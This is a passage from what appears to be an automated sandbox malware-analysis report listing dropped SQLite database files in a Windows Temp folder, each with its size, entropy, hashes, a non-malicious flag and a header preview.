                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\jTiIVbMuxL

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\jf692qeTIY

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\jqtuqN3Tc7

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\k3lQMnZl2r

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\k717tw0uz1

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\koOIYHU9AE

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\lA48KBqJDg

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\lJzskGXcRq

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\ll9PzN19MP

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\lrRrIhsYqw

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\nDwgKxEFZ1

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\nqkc4aZPZ0

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\nsH0uxPM7g

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\ny3b86gmHR

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\oA8CuGYs7L

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\oMT8CcgrUs

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\oRasSfMFxZ

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\ol1wSnqbP9

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\p2jfIe05Tr

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\p3EWGTQorw

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\p4GtkQUFm2

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\pIlINyaaBd

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\pNm95bSwEI

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\q6wU02RCns

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
